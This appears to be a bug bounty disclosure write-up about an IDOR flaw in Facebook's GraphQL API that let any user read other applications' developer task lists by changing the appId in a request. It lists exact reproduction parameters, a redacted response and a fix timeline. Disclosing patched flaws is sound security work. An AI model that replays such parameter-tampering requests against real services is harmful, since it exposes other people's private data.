GraphQL IDOR: Access Developer Tasks List of any Facebook Application (Bug Bounty)

This vulnerability could have allowed a malicious user to access the developer task lists of any Facebook application. Developer tasks contain private information that should only be accessible to the authorized developer of the relevant Facebook application.

While browsing https://developers.facebook.com/apps/ I noticed a GraphQL request that was returning the tasks list of my Facebook application.

By intercepting the request and changing the appId value with the ID of a third party Facebook Application, I was able to access to the tasks list of the targeted app.

Reproduction Steps

1) Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“appId”:”X”}&doc_id=265437575802287

Where X is the appId

The GraphQL response will return the developer tasks list of the targeted Facebook application:

{
“data”:{
“app_tasks”:[
{“id”:”REDACTED”,
“app_id”:”X”,
“app_name”:”REDACTED”,
“task_objective”:”REDACTED”,
“deadline”:1606147652,
“completion_time”:1605495171}],
“user_tasks_open_count”:0},
“extensions”:{
“is_final”:true}
}

Timeline

January 6, 2021: Report Sent
January 8, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded by Facebook

Twitter: https://twitter.com/amineaboud